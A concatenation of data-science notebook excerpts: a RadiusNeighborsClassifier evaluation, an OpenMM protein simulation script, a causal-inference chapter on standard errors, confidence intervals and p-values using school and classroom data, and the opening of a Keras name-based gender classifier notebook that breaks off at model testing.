For more information refer: [API](https://scikit-learn.org/stable/modules/generated/sklearn.neighbors.RadiusNeighborsClassifier.html)
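To make the radius idea concrete, here is a small sketch on hypothetical one-dimensional data (the points, radius, and labels below are made up for illustration): training points within `radius` of a query vote on its label, and a query with no neighbours inside the radius receives `outlier_label`.

```python
import numpy as np
from sklearn.neighbors import RadiusNeighborsClassifier

# Two well-separated clusters of made-up points
X_toy = np.array([[0.0], [0.1], [0.2], [5.0], [5.1], [5.2]])
y_toy = np.array([0, 0, 0, 1, 1, 1])

clf = RadiusNeighborsClassifier(radius=1.0, outlier_label=-1)
clf.fit(X_toy, y_toy)

# Queries near each cluster pick up that cluster's label; the query at 2.5
# has no neighbours within radius 1.0, so it gets the outlier label -1.
print(clf.predict([[0.05], [5.05], [2.5]]))
```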
#### Data Rescaling
MinMaxScaler subtracts the minimum value in the feature and then divides by the range, where range is the difference between the original maximum and original minimum.
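As a quick illustration of that formula, `x' = (x - min) / (max - min)`, applied to a made-up column:

```python
import numpy as np
from sklearn.preprocessing import MinMaxScaler

data = np.array([[1.0], [3.0], [5.0]])  # min = 1, range = 5 - 1 = 4
scaled = MinMaxScaler().fit_transform(data)
print(scaled.ravel())  # (x - 1) / 4 → 0, 0.5, 1
```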
```
# Build Model here
model = make_pipeline(MinMaxScaler(),RadiusNeighborsClassifier(n_jobs=-1))
model.fit(x_train, y_train)
```
#### Model Accuracy
The score() method returns the mean accuracy on the given test data and labels.
In multi-label classification, this is the subset accuracy which is a harsh metric since you require for each sample that each label set be correctly predicted.
```
print("Accuracy score {:.2f} %\n".format(model.score(x_test,y_test)*100))
```
#### Confusion Matrix
A confusion matrix is utilized to understand the performance of the classification model or algorithm in machine learning for a given test set where results are known.
```
plot_confusion_matrix(model,x_test,y_test,cmap=plt.cm.Blues)
```
#### Classification Report
A classification report is used to measure the quality of predictions from a classification algorithm: how many predictions were right and how many were wrong, broken down per class.
* **where**:
 - Precision:- accuracy of the positive predictions.
 - Recall:- fraction of actual positives that were correctly identified.
 - f1-score:- harmonic mean of precision and recall.
 - support:- the number of actual occurrences of each class in the specified dataset.
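To make these definitions concrete, here is a small sketch that computes the metrics by hand on a made-up set of labels and checks them against scikit-learn's implementations:

```python
from sklearn.metrics import precision_score, recall_score, f1_score

y_true = [1, 1, 1, 1, 0, 0, 0, 0]
y_pred = [1, 1, 1, 0, 1, 0, 0, 0]  # TP=3, FN=1, FP=1, TN=3

precision = 3 / (3 + 1)  # TP / (TP + FP)
recall = 3 / (3 + 1)     # TP / (TP + FN)
f1 = 2 * precision * recall / (precision + recall)  # harmonic mean

# scikit-learn agrees with the hand computation
assert precision == precision_score(y_true, y_pred)
assert recall == recall_score(y_true, y_pred)
assert abs(f1 - f1_score(y_true, y_pred)) < 1e-12
print(precision, recall, f1)  # 0.75 0.75 0.75
```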
```
print(classification_report(y_test,model.predict(x_test)))
```
#### Creator: Viraj Jayant, Github: [Profile](https://github.com/Viraj-Jayant/)
# SIMULATE THE SYSTEM
```
import simtk.openmm as mm # Main OpenMM functionality
import simtk.openmm.app as app # Application layer (handy interface)
import simtk.unit as unit # Unit/quantity handling
import mdtraj
import matplotlib as mpl
import matplotlib.pyplot as plt
import os
cwd = os.getcwd()
solvent_solute_system = os.path.join(cwd, 'files/6a5j_protein/solv.pdb')
molecule = app.PDBFile(solvent_solute_system) # Load the solvated peptide
```
### (a) System object from topology of solvated peptide
```
forcefield = app.ForceField("amber14/protein.ff14SB.xml", "amber14/tip3p.xml")
system = forcefield.createSystem(
molecule.topology,
nonbondedMethod=app.PME, # Non-bonded interactions
nonbondedCutoff=1 * unit.nanometer, # Cut-off of non-bonded interactions
constraints=app.HBonds
)
```
### (b) Simulation using Langevin integrator with timesteps of 2 fs at 300 K
```
integrator = mm.LangevinIntegrator(300.*unit.kelvin, 1./unit.picosecond, 2.*unit.femtoseconds)
simulation = app.Simulation(
molecule.topology, # Topology
system, # System
integrator, # Integrator
mm.Platform.getPlatformByName('CPU') # Platform = 'CPU' or 'CUDA'
)
simulation.context.setPositions(molecule.positions) # Add the current atomic positions of the solvated peptide
# to the context of the simulation.
```
### (c) Energy minimization of the system
```
simulation.minimizeEnergy()
state = simulation.context.getState(getPositions=True) # New co-ordinates
molecule.positions = state.getPositions()
minimized_system = os.path.join(cwd, 'files/6a5j_protein/min.pdb')
with open(minimized_system, "w") as file_:
molecule.writeFile(
molecule.topology, molecule.positions,
file=file_
)
# One can visualize this in VMD and see the difference between the original and the minimised structure
```
### (d) Equilibration of the system in the NVT ensemble for 100 ps
```
molecule = app.PDBFile(minimized_system)
simulation.context.setPositions(molecule.positions)
run_length = 50000 # 50000 * 2 fs = 100 ps
equilibration_log = os.path.join(cwd, 'files/6a5j_protein/equilibration.log')
simulation.reporters.append(
app.StateDataReporter(
equilibration_log, 500, step=True, # 500 = Write every 500th step
potentialEnergy=True, totalEnergy=True,
temperature=True, progress=True,
remainingTime=True, speed=True,
totalSteps=run_length,
separator='\t')
)
simulation.step(run_length) # Run the simulation
save_state = os.path.join(cwd, 'files/6a5j_protein/eq.xml')
simulation.saveState(save_state)
pot_e = []
tot_e = []
temperature = []
with open(equilibration_log) as file_:
for line in file_:
if line.startswith("#"):
continue
pot_e_, tot_e_, temperature_ = line.split()[2:5]
pot_e.append(float(pot_e_))
tot_e.append(float(tot_e_))
temperature.append(float(temperature_))
plt.rcParams["figure.figsize"] = (10,7)
t = range(1, 101)
fig, ax = plt.subplots()
ax.plot(t, [x / 1000 for x in pot_e], label="potential")
ax.plot(t, [x / 1000 for x in tot_e], label="total")
ax.set(**{
"xlabel": "time / ps",
"xlim": (0, 100),
"ylabel": "energy / 10$^{3}$ kJ mol$^{-1}$"
})
ax.legend(
framealpha=1,
edgecolor="k",
fancybox=False
)
fig, ax = plt.subplots()
ax.plot(t, temperature)
ax.set(**{
"xlabel": "time / ps",
"xlim": (0, 100),
"ylabel": "temperature / K"
})
```
### (e) Production run (on the CUDA platform)
```
simulation.loadState(save_state)
production_log = os.path.join(cwd, 'files/6a5j_protein/simulation.log') # Don't shadow the Simulation object
simulation.reporters = [] # Reset the simulation reporters
run_length = 375000000 # 375000000 * 2 fs = 750 ns
simulation.reporters.append(
app.StateDataReporter( # State reporter that appends potential energy
production_log, 5000, step=True,
potentialEnergy=True,
temperature=True, progress=True,
remainingTime=True, speed=True,
totalSteps=run_length,
separator='\t')
)
production_dcd = os.path.join(cwd, 'files/6a5j_protein/prod_run.dcd')
simulation.reporters.append(mdtraj.reporters.DCDReporter(
production_dcd, 5000, # Structure reporter that appends positions
atomSubset=range(260)) # atomSubset = Save just the peptide atoms
)
simulation.step(run_length)
# One can visualize the saved .dcd file in VMD and compare with the original
```
# 03 - Stats Review: The Most Dangerous Equation
In his famous article of 2007, Howard Wainer writes about very dangerous equations:
"Some equations are dangerous if you know them, and others are dangerous if you do not. The first category may pose danger because the secrets within its bounds open doors behind which lies terrible peril. The obvious winner in this is Einstein’s iconic equation \\(E = MC^2\\), for it provides a measure of the enormous energy hidden within ordinary matter. \[...\] Instead I am interested in equations that unleash their danger not when we know about them, but rather when we do not. Kept close at hand, these equations allow us to understand things clearly, but their absence leaves us dangerously ignorant."
The equation he talks about is Moivre’s equation:
$
SE = \dfrac{\sigma}{\sqrt{n}}
$
where \\(SE\\) is the standard error of the mean, \\(\sigma\\) is the standard deviation and \\(n\\) is the sample size. Sounds like a piece of math the brave and true should master, so let's get to it.
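As a quick sanity check of the equation, we can simulate many samples and compare the spread of their means with \\(\sigma/\sqrt{n}\\) (the numbers below are arbitrary):

```python
import numpy as np

np.random.seed(0)
sigma, n = 10, 100
# Standard deviation of many simulated sample means should be ≈ sigma / sqrt(n)
means = [np.random.normal(0, sigma, n).mean() for _ in range(20000)]
print(np.std(means), sigma / np.sqrt(n))  # both ≈ 1.0
```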
To see why not knowing this equation is very dangerous, let's take a look at some education data. I've compiled data on ENEM scores (Brazilian standardised high school scores, similar to SAT) from different schools for a period of 3 years. I also did some cleaning on the data to keep only the information relevant to us. The original data can be downloaded in the [Inep website](http://portal.inep.gov.br/web/guest/microdados#).
If we look at the top performing schools, something catches the eye: those schools have a fairly small number of students.
```
import warnings
warnings.filterwarnings('ignore')
import pandas as pd
import numpy as np
from scipy import stats
import seaborn as sns
from matplotlib import pyplot as plt
from matplotlib import style
style.use("fivethirtyeight")
df = pd.read_csv("./data/enem_scores.csv")
df.sort_values(by="avg_score", ascending=False).head(10)
```
Looking at it from another angle, we can separate only the 1% top schools and study them. What are they like? Perhaps we can learn something from the best and replicate it elsewhere. And sure enough, if we look at the top 1% schools, we figure out they have, on average, fewer students.
```
plot_data = (df
.assign(top_school = df["avg_score"] >= np.quantile(df["avg_score"], .99))
[["top_school", "number_of_students"]]
.query(f"number_of_students<{np.quantile(df['number_of_students'], .98)}")) # remove outliers
plt.figure(figsize=(6,6))
sns.boxplot(x="top_school", y="number_of_students", data=plot_data)
plt.title("Number of Students of 1% Top Schools (Right)");
```
One natural conclusion that follows is that small schools lead to higher academic performance. This makes intuitive sense, since we believe that less students per teacher allows the teacher to give focused attention to each student. But what does this have to do with Moivre’s equation? And why is it dangerous?
Well, it becomes dangerous once people start to make important and expensive decisions based on this information. In his article, Howard continues:
"In the 1990s, it became popular to champion reductions in the size of schools. Numerous philanthropic organisations and government agencies funded the division of larger schools based on the fact that students at small schools are over represented in groups with high test scores."
What people forgot to do was to look also at the bottom 1% of schools. If we do that, lo and behold! They also have very few students!
```
q_99 = np.quantile(df["avg_score"], .99)
q_01 = np.quantile(df["avg_score"], .01)
plot_data = (df
.sample(10000)
.assign(Group = lambda d: np.select([d["avg_score"] > q_99, d["avg_score"] < q_01],
["Top", "Bottom"], "Middle")))
plt.figure(figsize=(10,5))
sns.scatterplot(y="avg_score", x="number_of_students", hue="Group", data=plot_data)
plt.title("ENEM Score by Number of Students in the School");
```
What we are seeing above is exactly what is expected according to Moivre’s equation. As the number of students grows, the average score becomes more and more precise. Schools with very few students can have very high and very low scores simply due to chance. This is less likely to occur with large schools. Moivre’s equation talks about a fundamental fact about the reality of information and records in the form of data: it is always imprecise. The question then becomes how imprecise.
Statistics is the science that deals with these imprecisions so they don't catch us off-guard. As Taleb puts it in his book, Fooled by Randomness:
> Probability is not a mere computation of odds on the dice or more complicated variants; it is the acceptance of the lack of certainty in our knowledge and the development of methods for dealing with our ignorance.
One way to quantify our uncertainty is the **variance of our estimates**. Variance tells us how much observations deviate from their central and most probable value. As indicated by Moivre’s equation, this uncertainty shrinks as the amount of data we observe increases. This makes sense, right? If we see lots and lots of students performing excellently at a school, we can be more confident that this is indeed a good school. However, if we see a school with only 10 students and 8 of them perform well, we need to be more suspicious. It could be that, by chance, that school got some above average students.
The beautiful triangular plot we see above tells exactly this story. It shows us how our estimates of school performance have a huge variance when the sample sizes are small. It also shows that variance shrinks as the sample size increases. This is true for the average score in a school, but it is also true for any summary statistic we have, including the ATE we so often want to estimate.
## The Standard Error of Our Estimates
Since this is just a review on statistics, I'll take the liberty to go a bit faster now. If you are not familiar with distributions, variance and standard errors, please, do read on, but keep in mind that you might need some additional resources. I suggest you google any MIT course on introduction to statistics. They are usually quite good.
In the previous section, we estimated the average treatment effect \\(E[Y_1-Y_0]\\) as the difference in the means between the treated and the untreated \\(E[Y|T=1]-E[Y|T=0]\\). As our motivating example, we figured out the \\(ATE\\) for online classes. We also saw that it was a negative impact, that is, online classes made students perform about 5 points worse than the students with face to face classes. Now, we get to see if this impact is statistically significant.
To do so, we need to estimate the \\(SE\\). We already have \\(n\\), our sample size. To get the estimate for the standard deviation we can do the following
$
\hat{\sigma}=\sqrt{\dfrac{1}{N-1}\sum_{i=1}^N (x_i-\bar{x})^2}
$
where \\(\bar{x}\\) is the mean of \\(x\\). Fortunately for us, most programming software already implements this. In Pandas, we can use the method [std](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.std.html).
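As a quick check, the estimator above agrees with the sample standard deviation computed by NumPy with `ddof=1`, which is the same N-1 denominator pandas' `std` uses by default:

```python
import numpy as np

x = np.array([4.0, 7.0, 1.0, 9.0, 5.0])
# Hand-rolled sample standard deviation with the N-1 denominator
sigma_hat = np.sqrt(((x - x.mean()) ** 2).sum() / (len(x) - 1))
print(sigma_hat, np.std(x, ddof=1))  # identical values
```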
```
data = pd.read_csv("./data/online_classroom.csv")
online = data.query("format_ol==1")["falsexam"]
face_to_face = data.query("format_ol==0 & format_blended==0")["falsexam"]
def se(y: pd.Series):
return y.std() / np.sqrt(len(y))
print("SE for Online:", se(online))
print("SE for Face to Face:", se(face_to_face))
```
## Confidence Intervals
The standard error of our estimate is a measure of confidence. To understand exactly what it means, we need to go into turbulent and polemic statistical waters. For one view of statistics, the frequentist view, we would say that the data we have is nothing more than a manifestation of a true data generating process. This process is abstract and ideal. It is governed by true parameters that are unchanging but also unknown to us. In the context of the students test, if we could run multiple experiments and collect multiple datasets, all would resemble the true underlying data generating process, but wouldn't be exactly like it. This is very much like Plato's writing on the Forms:
> Each [of the essential forms] manifests itself in a great variety of combinations, with actions, with material things, and with one another, and each seems to be many
To better grasp this, let's suppose we have a true abstract distribution of students' test score. This is a normal distribution with true mean of 74 and true standard deviation of 2. From this distribution, we can run 10000 experiments. On each one, we collect 500 samples. Some experiment data will have a mean lower than the true one, some will be higher. If we plot them in a histogram, we can see that means of the experiments are distributed around the true mean.
```
true_std = 2
true_mean = 74
n = 500
def run_experiment():
    return np.random.normal(true_mean, true_std, n)
np.random.seed(42)
plt.figure(figsize=(8,5))
freq, bins, img = plt.hist([run_experiment().mean() for _ in range(10000)], bins=40, label="Experiment Means")
plt.vlines(true_mean, ymin=0, ymax=freq.max(), linestyles="dashed", label="True Mean", color="orange")
plt.legend();
```
Notice that we are talking about the mean of means here. So, by chance, we could have an experiment where the mean is somewhat below or above the true mean. This is to say that we can never be sure that the mean of our experiment matches the true platonic and ideal mean. However, **with the standard error, we can create an interval that will contain the true mean 95% of the time**.
In real life, we don't have the luxury of simulating the same experiment with multiple datasets. We often only have one. But we can draw on the intuition above to construct what we call **confidence intervals**. Confidence intervals come with a probability attached to them. The most common one is 95%. This probability tells us how many of the hypothetical confidence intervals we would build from different studies contain the true mean. For example, the 95% confidence intervals computed from many similar studies would contain the true mean 95% of the time.
To calculate the confidence interval, we use what is called the **central limit theorem**. This theorem states that **means of experiments are normally distributed**. From statistical theory, we know that 95% of the mass of a normal distribution is between 2 standard deviations above and below the mean. Technically, 1.96, but 2 is close enough.

The Standard Error of the mean serves as our estimate of the distribution of the experiment means. So, if we multiply it by 2 and add and subtract it from the mean of one of our experiments, we will construct a 95% confidence interval for the true mean.
```
np.random.seed(321)
exp_data = run_experiment()
exp_se = exp_data.std() / np.sqrt(len(exp_data))
exp_mu = exp_data.mean()
ci = (exp_mu - 2 * exp_se, exp_mu + 2 * exp_se)
print(ci)
x = np.linspace(exp_mu - 4*exp_se, exp_mu + 4*exp_se, 100)
y = stats.norm.pdf(x, exp_mu, exp_se)
plt.plot(x, y)
plt.vlines(ci[1], ymin=0, ymax=1)
plt.vlines(ci[0], ymin=0, ymax=1, label="95% CI")
plt.legend()
plt.show()
```
Of course, we don't need to restrict ourselves to the 95% confidence interval. We could generate the 99% interval by finding what we need to multiply the standard deviation by so the interval contains 99% of the mass of a normal distribution.
The function `ppf` in python gives us the inverse of the CDF. So, `ppf(0.5)` will return 0.0, saying that 50% of the mass of the standard normal distribution is below 0.0. By the same token, if we plug in 0.995, we will get the value `z` such that 99.5% of the distribution's mass falls below it. In other words, 0.5% of the mass falls above this value. Instead of multiplying the standard error by 2 like we did to find the 95% CI, we will multiply it by `z`, which will result in the 99% CI.
```
from scipy import stats
z = stats.norm.ppf(.995)
print(z)
ci = (exp_mu - z * exp_se, exp_mu + z * exp_se)
ci
x = np.linspace(exp_mu - 4*exp_se, exp_mu + 4*exp_se, 100)
y = stats.norm.pdf(x, exp_mu, exp_se)
plt.plot(x, y)
plt.vlines(ci[1], ymin=0, ymax=1)
plt.vlines(ci[0], ymin=0, ymax=1, label="99% CI")
plt.legend()
plt.show()
```
Back to our classroom experiment, we can construct the confidence interval for the mean exam score for both the online and face to face students' group
```
def ci(y: pd.Series):
return (y.mean() - 2 * se(y), y.mean() + 2 * se(y))
print("95% CI for Online:", ci(online))
print("95% for Face to Face:", ci(face_to_face))
```
What we can see is that the 95% CI of the groups don't overlap. The lower end of the CI for the Face to Face class is above the upper end of the CI for online classes. This is evidence that our result is not by chance, and that the true mean for students in face to face classes is higher than the true mean for students in online classes. In other words, there is a significant causal decrease in academic performance when switching from face to face to online classes.
As a recap, confidence intervals are a way to place uncertainty around our estimates. The smaller the sample size, the larger the standard error and the wider the confidence interval. Finally, you should always be suspicious of measurements without any uncertainty metric attached to it. Since they are super easy to compute, lack of confidence intervals signals either some bad intentions or simply lack of knowledge, which is equally concerning.

One final word of caution here. Confidence intervals are trickier to interpret than at first glance. For instance, I **shouldn't** say that this particular 95% confidence interval contains the true population mean with 95% chance. That's because in frequentist statistics, the one that uses confidence intervals, the population mean is regarded as a true population constant. So it either is or isn't in our particular confidence interval. In other words, our particular confidence interval either contains or doesn't contain the true mean. If it does, the chance of containing it would be 100%, not 95%. If it doesn't, the chance would be 0%. Rather, in confidence intervals, the 95% refers to the frequency that such confidence intervals, computed in many many studies, contain the true mean. 95% is our confidence in the algorithm used to compute the 95% CI, not on the particular interval itself.
Now, having said that, as an Economist (statisticians, please look away now), I think this purism is not very useful. In practice, you will see people saying that the particular confidence interval contains the true mean 95% of the time. Although wrong, this is not very harmful, as it still places a precise degree of uncertainty in our estimates. Moreover, if we switch to Bayesian statistics and use credible intervals instead of confidence intervals, we would be able to say that the interval contains the distribution mean 95% of the time. Also, from what I've seen in practice, with decent sample sizes, Bayesian credible intervals are more similar to confidence intervals than both Bayesians and frequentists would like to admit. So, if my word counts for anything, feel free to say whatever you want about your confidence interval. I don't care if you say they contain the true mean 95% of the time. Just, please, never forget to place them around your estimates, otherwise you will look silly.
## Hypothesis Testing
Another way to incorporate uncertainty is to state a hypothesis test: is the difference in means statistically different from zero (or any other value)? To do so, we will recall that the sum or difference of 2 normal distributions is also a normal distribution. The resulting mean will be the sum or difference between the two means, while the variance will always be the sum of the variances:
$
N(\mu_1, \sigma_1^2) - N(\mu_2, \sigma_2^2) = N(\mu_1 - \mu_2, \sigma_1^2 + \sigma_2^2)
$
$
N(\mu_1, \sigma_1^2) + N(\mu_2, \sigma_2^2) = N(\mu_1 + \mu_2, \sigma_1^2 + \sigma_2^2)
$
If you don't recall, it's OK. We can always use code and simulated data to check:
```
np.random.seed(123)
n1 = np.random.normal(4, 3, 30000)
n2 = np.random.normal(1, 4, 30000)
n_diff = n2 - n1
sns.distplot(n1, hist=False, label="N(4,3)")
sns.distplot(n2, hist=False, label="N(1,4)")
sns.distplot(n_diff, hist=False, label=f"N(4,3) - N(1,4) = N(-1, 5)")
plt.show()
```
If we take the distribution of the means of our 2 groups and subtract one from the other, we will have a third distribution. The mean of this final distribution will be the difference in the means, and the standard deviation of this distribution will be the square root of the sum of the variances of the individual means.
$
\mu_{diff} = \mu_1 - \mu_2
$
$
SE_{diff} = \sqrt{SE_1^2 + SE_2^2} = \sqrt{\sigma_1^2/n_1 + \sigma_2^2/n_2}
$
Let's return to our classroom example. We will construct this distribution of the difference. Of course, once we have it, building the 95% CI is very easy.
```
diff_mu = online.mean() - face_to_face.mean()
diff_se = np.sqrt(face_to_face.var()/len(face_to_face) + online.var()/len(online))
ci = (diff_mu - 1.96*diff_se, diff_mu + 1.96*diff_se)
print(ci)
x = np.linspace(diff_mu - 4*diff_se, diff_mu + 4*diff_se, 100)
y = stats.norm.pdf(x, diff_mu, diff_se)
plt.plot(x, y)
plt.vlines(ci[1], ymin=0, ymax=.05)
plt.vlines(ci[0], ymin=0, ymax=.05, label="95% CI")
plt.legend()
plt.show()
```
With this at hand, we can say that we are 95% confident that the true difference between the online and face to face group falls between -8.37 and -1.44. We can also construct a **z statistic** by dividing the difference in means by the \\(SE\\) of the difference.
$
z = \dfrac{\mu_{diff} - H_{0}}{SE_{diff}} = \dfrac{(\mu_1 - \mu_2) - H_{0}}{\sqrt{\sigma_1^2/n_1 + \sigma_2^2/n_2}}
$
Where \\(H_0\\) is the value which we want to test our difference against.
The z statistic is a measure of how extreme the observed difference is. To test our hypothesis that the difference in the means is statistically different from zero, we will use contradiction. We will assume that the opposite is true, that is, we will assume that the difference is zero. This is called a null hypothesis, or \\(H_0\\). Then, we will ask ourselves "is it likely that we would observe such a difference if the true difference were indeed zero?" In statistical math terms, we can translate this question to checking how far from zero is our z statistic.
Under \\(H_0\\), the z statistic follows a standard normal distribution. So, if the difference is indeed zero, we would see the z statistic within 2 standard deviations of the mean 95% of the time. The direct consequence of this is that if z falls above or below 2 standard deviations, we can reject the null hypothesis with 95% confidence.
Let's see how this looks in our classroom example.
```
z = diff_mu / diff_se
print(z)
x = np.linspace(-4,4,100)
y = stats.norm.pdf(x, 0, 1)
plt.plot(x, y, label="Standard Normal")
plt.vlines(z, ymin=0, ymax=.05, label="Z statistic", color="C1")
plt.legend()
plt.show()
```
This looks like a pretty extreme value. Indeed, it is above 2, which means there is less than a 5% chance that we would see such an extreme value if there were no difference in the groups. This again leads us to conclude that switching from face to face to online classes causes a statistically significant drop in academic performance.
One final interesting thing about hypothesis tests is that they are less conservative than checking whether the 95% CIs of the treated and untreated groups overlap. In other words, if the confidence intervals of the two groups overlap, the result can still be statistically significant. For example, let's pretend that the face-to-face group has an average score of 74 and the online group an average score of 71, each with a standard error of 1.
```
cont_mu, cont_se = (71, 1)
test_mu, test_se = (74, 1)
diff_mu = test_mu - cont_mu
diff_se = np.sqrt(cont_se**2 + test_se**2) # standard errors add in quadrature
print("Control 95% CI:", (cont_mu-1.96*cont_se, cont_mu+1.96*cont_se))
print("Test 95% CI:", (test_mu-1.96*test_se, test_mu+1.96*test_se))
print("Diff 95% CI:", (diff_mu-1.96*diff_se, diff_mu+1.96*diff_se))
```
If we construct the confidence intervals for these groups, they overlap: the upper bound of the 95% CI of the online group is 72.96 and the lower bound of the 95% CI of the face-to-face group is 72.04. However, once we compute the 95% confidence interval for the difference between the group means, (0.23, 5.77), we can see that it does not contain zero. In summary, even though the individual confidence intervals overlap, the difference can still be statistically different from zero.
## P-values
I've said previously that there is less than 5% chance that we would observe such an extreme value if the difference between online and face to face groups were actually zero. But can we estimate exactly what is that chance? How likely are we to observe such an extreme value? Enters p-values!
Just like with confidence intervals (and most frequentist statistics, as a matter of fact) the true definition of p-values can be very confusing. So, to not take any risks, I'll copy the definition from Wikipedia: "the p-value is the probability of obtaining test results at least as extreme as the results actually observed during the test, assuming that the null hypothesis is correct".
To put it more succinctly, the p-value is the probability of seeing such data, given that the null-hypothesis is true. It measures how unlikely it is that you are seeing a measurement if the null-hypothesis is true. Naturally, this often gets confused with the probability of the null-hypothesis being true. Note the difference here. The p-value is NOT \\(P(H_0|data)\\), but rather \\(P(data|H_0)\\).
But don't let this complexity fool you. In practical terms, they are pretty straightforward to use.

To get the p-value, we need to compute the area under the standard normal distribution before or after the z statistic. Fortunately, we have a computer to do this calculation for us. We can simply plug the z statistic in the CDF of the standard normal distribution.
```
print("P-value:", stats.norm.cdf(z))
```
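To see that this number really is a frequency under the null, we can simulate the null hypothesis directly (the observed z value below is a hypothetical stand-in close to the one we computed):

```python
import numpy as np
from scipy import stats

np.random.seed(1)
z_obs = -2.78  # hypothetical observed z statistic, for illustration
# Under H0 the z statistic is standard normal, so the p-value is simply
# the frequency of draws at least as extreme as the one observed.
draws = np.random.normal(0, 1, 1_000_000)
print((draws <= z_obs).mean())  # ≈ 0.0027, the simulated p-value
print(stats.norm.cdf(z_obs))    # ≈ 0.0027, the analytical p-value
```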
This means there is only a 0.27% chance of observing such an extreme z statistic if the difference were zero. Notice that the p-value is interesting because it saves us from having to specify a confidence level, like 95% or 99%. But, if we wish to report one, from the p-value we know exactly at which confidence levels our test will pass or fail. For instance, with a p-value of 0.0027, we have significance up to the 0.27% level. So, while neither the 95% CI nor the 99% CI for the difference will contain zero, the 99.9% CI will.
```
diff_mu = online.mean() - face_to_face.mean()
diff_se = np.sqrt(face_to_face.var()/len(face_to_face) + online.var()/len(online))
print("95% CI:", (diff_mu - stats.norm.ppf(.975)*diff_se, diff_mu + stats.norm.ppf(.975)*diff_se))
print("99% CI:", (diff_mu - stats.norm.ppf(.995)*diff_se, diff_mu + stats.norm.ppf(.995)*diff_se))
print("99.9% CI:", (diff_mu - stats.norm.ppf(.9995)*diff_se, diff_mu + stats.norm.ppf(.9995)*diff_se))
```
## Key Ideas
We've seen how important it is to know Moivre’s equation, and we used it to place a degree of certainty around our estimates. Namely, we figured out that online classes cause a decrease in academic performance compared to face to face classes. We also saw that this was a statistically significant result. We did it by comparing the confidence intervals of the means of the 2 groups, by looking at the confidence interval for the difference, by doing a hypothesis test and by looking at the p-value. Let's wrap everything up in a single function that does an A/B test comparison like the one we did above:
```
def AB_test(test: pd.Series, control: pd.Series, confidence=0.95, h0=0):
    mu1, mu2 = test.mean(), control.mean()
    se1, se2 = test.std() / np.sqrt(len(test)), control.std() / np.sqrt(len(control))
    diff = mu1 - mu2
    se_diff = np.sqrt(test.var()/len(test) + control.var()/len(control))
    z_stats = (diff-h0)/se_diff
    p_value = stats.norm.cdf(z_stats)
    def critical(se): return -se*stats.norm.ppf((1 - confidence)/2)
    print(f"Test {confidence*100}% CI: {mu1} +- {critical(se1)}")
    print(f"Control {confidence*100}% CI: {mu2} +- {critical(se2)}")
    print(f"Test-Control {confidence*100}% CI: {diff} +- {critical(se_diff)}")
    print(f"Z Statistic {z_stats}")
    print(f"P-Value {p_value}")

AB_test(online, face_to_face)
```
Since our function is generic enough, we can test other null hypotheses. For instance, we can try to reject the hypothesis that the difference between online and face to face class performance is -1. With the results we get, we can say with 95% confidence that the difference is greater than -1. But we can't say it with 99% confidence:
```
AB_test(online, face_to_face, h0=-1)
```
## References
I like to think of this entire book as a tribute to Joshua Angrist, Alberto Abadie and Christopher Walters for their amazing Econometrics class. Most of the ideas here are taken from their classes at the American Economic Association. Watching them is what is keeping me sane during this tough year of 2020.
* [Cross-Section Econometrics](https://www.aeaweb.org/conference/cont-ed/2017-webcasts)
* [Mastering Mostly Harmless Econometrics](https://www.aeaweb.org/conference/cont-ed/2020-webcasts)
I'd also like to reference the amazing books from Angrist. They have shown me that Econometrics, or 'Metrics as they call it, is not only extremely useful but also profoundly fun.
* [Mostly Harmless Econometrics](https://www.mostlyharmlesseconometrics.com/)
* [Mastering 'Metrics](https://www.masteringmetrics.com/)
My final reference is Miguel Hernan and Jamie Robins' book. It has been my trustworthy companion in the most thorny causal questions I had to answer.
* [Causal Inference Book](https://www.hsph.harvard.edu/miguel-hernan/causal-inference-book/)
In this particular section, I've also referenced The [Most Dangerous Equation](https://www.researchgate.net/publication/255612702_The_Most_Dangerous_Equation), by Howard Wainer.
Finally, if you are curious about the correct interpretation of the statistical concepts we've discussed here, I recommend reading the paper by Greenland et al, 2016: [Statistical tests, P values, confidence intervals, and power: a guide to misinterpretations](https://link.springer.com/content/pdf/10.1007/s10654-016-0149-3.pdf).

## Contribute
Causal Inference for the Brave and True is an open-source material on causal inference, the statistics of science. It uses only free software, based in Python. Its goal is to be accessible monetarily and intellectually.
If you found this book valuable and you want to support it, please go to [Patreon](https://www.patreon.com/causal_inference_for_the_brave_and_true). If you are not ready to contribute financially, you can also help by fixing typos, suggesting edits or giving feedback on passages you didn't understand. Just go to the book's repository and [open an issue](https://github.com/matheusfacure/python-causality-handbook/issues). Finally, if you liked this content, please share it with others who might find it useful and give it a [star on GitHub](https://github.com/matheusfacure/python-causality-handbook/stargazers).
# Gender Prediction, using Pre-trained Keras Model
Deep Neural Networks can be used to extract features in the input and derive higher level abstractions. This technique is used regularly in vision, speech and text analysis. In this exercise, we use a pre-trained deep learning model that identifies low-level features in texts containing people's names, and classifies each name into one of two categories - Male or Female.
## Network Architecture
The problem we are trying to solve is to predict whether a given name belongs to a male or female. We will use supervised learning, where the character sequence making up the names would be `X` variable, and the flag indicating **Male(M)** or **Female(F)** would be `Y` variable.
We use a stacked 2-layer LSTM and a final dense layer with softmax activation as our network architecture. We use categorical cross-entropy as the loss function, with an Adam optimizer. A 20% dropout layer is added for regularization to avoid over-fitting.
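The architecture described above could be sketched in Keras roughly as follows. The layer width of 256 and the input dimensions are illustrative assumptions — the actual pre-trained model we load below fixes these values:

```python
from keras.models import Sequential
from keras.layers import Dense, Dropout, LSTM

max_name_length = 15  # assumed sequence length (one-hot encoded characters)
alphabet_size = 26    # assumed alphabet size

model = Sequential()
# Stacked 2-layer LSTM over the character sequence
model.add(LSTM(256, return_sequences=True,
               input_shape=(max_name_length, alphabet_size)))
model.add(LSTM(256))
# 20% dropout for regularization
model.add(Dropout(0.2))
# Final dense layer with softmax over the two classes (M/F)
model.add(Dense(2, activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam',
              metrics=['accuracy'])
```

We don't train this sketch here; the pre-trained artifact unpacked below already contains the fitted weights.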
## Dependencies
* The model was built using Keras, therefore we need to include the Keras deep learning library to build the network locally, in order to be able to test prior to hosting the model.
* While running on a SageMaker Notebook Instance, we choose the conda_tensorflow kernel, so that Keras code is compiled to use TensorFlow as the backend.
* If you choose P2 or P3 class instances for your Notebook, using TensorFlow ensures the low-level code takes advantage of all available GPUs, so no further dependencies need to be installed.
```
import os
import time
import numpy as np
import keras
from keras.models import load_model
import boto3
```
## Model testing
To test the validity of the model, we do some local testing.<p>
The model was built to process one-hot encoded data representing names, therefore we need to do the same pre-processing on our test data (one-hot encoding using the same character indices).<p>
